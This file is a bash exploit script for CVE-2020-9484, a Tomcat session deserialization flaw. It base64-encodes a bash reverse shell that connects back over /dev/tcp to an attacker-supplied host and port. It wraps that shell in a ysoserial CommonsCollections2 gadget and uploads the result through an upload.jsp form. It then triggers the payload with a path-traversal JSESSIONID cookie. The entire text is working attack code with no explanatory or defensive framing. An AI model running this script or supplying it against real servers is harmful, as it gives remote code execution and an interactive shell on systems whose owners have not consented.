CVE-2020-9484.sh

#!/bin/bash
NOCOLOR='\033[0m'
ORANGE='\033[0;33m'
GREEN='\033[0;32m'
echo -e ${ORANGE}"[*]Dont forget netcat listener on port ${args[2]}"
echo -e ${NOCOLOR}
args=("$@")
rng=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 5 | head -n 1)
if [ "$#" -ne 3 ]; then
        echo -e "\n\e[31m\e[1m[!] Wrong usage of parameters"
        echo -e "\e[1m\e[34m[*] Example usage: ./CVE-2020-9484 target attacker port "
else
payload=$(echo "bash -c 'bash -i >& /dev/tcp/${args[1]}/${args[2]} 0>&1'" | base64)
epayload="bash -c {echo,$payload}|{base64,-d}|{bash,-i}"
java -jar ysoserial-master-d367e379d9-1.jar CommonsCollections2 "$epayload" > $rng.session
echo -e ${ORANGE}"[*]Created file $rng.session"
echo -e ${NOCOLOR}
curl -F "image=@${rng}.session" http://${args[0]}:8080/upload.jsp?email=$rng &> /dev/null
curl --cookie "JSESSIONID=../../../../../opt/samples/uploads/${rng}" -L http://${args[0]}:8080/upload.jsp?email=$rng &> /dev/null
echo -e ${ORANGE}"[*]Cookie manipulation completed"
echo -e ${NOCOLOR}
echo -e ${GREEN}"[*]Exploit ran succesfully"
echo -e ${NOCOLOR}
fi